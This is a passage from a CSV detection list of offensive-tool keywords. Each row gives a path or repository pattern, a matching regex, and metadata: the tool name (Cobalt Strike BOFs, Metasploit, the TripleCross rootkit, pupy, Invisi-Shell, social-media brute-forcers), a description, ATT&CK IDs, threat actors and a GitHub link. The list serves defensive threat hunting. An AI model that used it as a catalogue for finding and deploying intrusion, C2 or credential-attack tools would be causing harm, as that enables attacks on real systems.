APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Injection/setthreadcontext*",".{0,1000}\/Injection\/setthreadcontext.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Injection/svcctrl/*",".{0,1000}\/Injection\/svcctrl\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - 
T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Injection/tooltip/*",".{0,1000}\/Injection\/tooltip\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" 
"*/Injection/uxsubclassinfo*",".{0,1000}\/Injection\/uxsubclassinfo.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/injection_lib.so*",".{0,1000}\/injection_lib\.so.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*/Injections/SQL.txt*",".{0,1000}\/Injections\/SQL\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information 
Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*/injectsu.exp*",".{0,1000}\/injectsu\.exp.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/injectsu.lib*",".{0,1000}\/injectsu\.lib.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/injectsu.pdb*",".{0,1000}\/injectsu\.pdb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/injectsu/*",".{0,1000}\/injectsu\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/inline_syscall.git*",".{0,1000}\/inline_syscall\.git.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" 
"*/inline_syscall/include/in_memory_init.hpp*",".{0,1000}\/inline_syscall\/include\/in_memory_init\.hpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*/inline-exec/*.exe",".{0,1000}\/inline\-exec\/.{0,1000}\.exe","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/InlineWhispers*",".{0,1000}\/InlineWhispers.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","10","10","295","41","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z" "*/insta-bf.git*",".{0,1000}\/insta\-bf\.git.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential 
Access","https://github.com/samsesh/insta-bf","1","1","N/A","7","1","47","10","2024-04-23T02:47:28Z","2020-11-20T22:22:48Z" "*/instabf.py*",".{0,1000}\/instabf\.py.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","1","N/A","7","1","47","10","2024-04-23T02:47:28Z","2020-11-20T22:22:48Z" "*/instabrute.py*",".{0,1000}\/instabrute\.py.{0,1000}","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","694","270","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" "*/instainsane.git*",".{0,1000}\/instainsane\.git.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/umeshshinde19/instainsane","1","1","N/A","7","6","519","335","2024-02-11T10:29:05Z","2018-12-02T22:48:11Z" "*/instainsane.sh*",".{0,1000}\/instainsane\.sh.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/umeshshinde19/instainsane","1","1","N/A","7","6","519","335","2024-02-11T10:29:05Z","2018-12-02T22:48:11Z" 
"*/install_elevated.py*",".{0,1000}\/install_elevated\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/install_locutus.sh*",".{0,1000}\/install_locutus\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*/install-sb.sh*",".{0,1000}\/install\-sb\.sh.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","7","10","2856","292","2024-03-24T09:16:18Z","2019-03-28T18:07:05Z" "*/insTof.py*",".{0,1000}\/insTof\.py.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","1","N/A","7","1","47","10","2024-04-23T02:47:28Z","2020-11-20T22:22:48Z" "*/interactive_shell.py*",".{0,1000}\/interactive_shell\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. 
Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/interactive_shell.py*",".{0,1000}\/interactive_shell\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/Intercepter-NG*.apk*",".{0,1000}\/Intercepter\-NG.{0,1000}\.apk.{0,1000}","offensive_tool_keyword","Intercepter-NG","android wifi sniffer","T1433","TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/intercepter-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/interesting-teamsmessages.csv*",".{0,1000}\/interesting\-teamsmessages\.csv.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation 
tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*/internal/C2/*.go*",".{0,1000}\/internal\/C2\/.{0,1000}\.go.{0,1000}","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","10","10","485","98","2024-04-01T15:33:47Z","2021-09-15T19:06:12Z" "*/internal/pipe/pipe.go*",".{0,1000}\/internal\/pipe\/pipe\.go.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6497","579","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z" "*/Internals/Coff.cs*",".{0,1000}\/Internals\/Coff\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - 
Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","135","19","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*/Inveigh.exe*",".{0,1000}\/Inveigh\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/Inveigh.git*",".{0,1000}\/Inveigh\.git.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "*/Inveigh.ps1*",".{0,1000}\/Inveigh\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/Inveigh.txt*",".{0,1000}\/Inveigh\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/Invisi-Shell.git*",".{0,1000}\/Invisi\-Shell\.git.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002?","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","1","N/A","10","10","1024","151","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z" "*/invocation:tor.service*",".{0,1000}\/invocation\:tor\.service.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. 
Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/Invoke-Adeleginator*",".{0,1000}\/Invoke\-Adeleginator.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","1","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*/Invoke-ADSBackdoor.ps1*",".{0,1000}\/Invoke\-ADSBackdoor\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/Invoke-Bof/*",".{0,1000}\/Invoke\-Bof\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 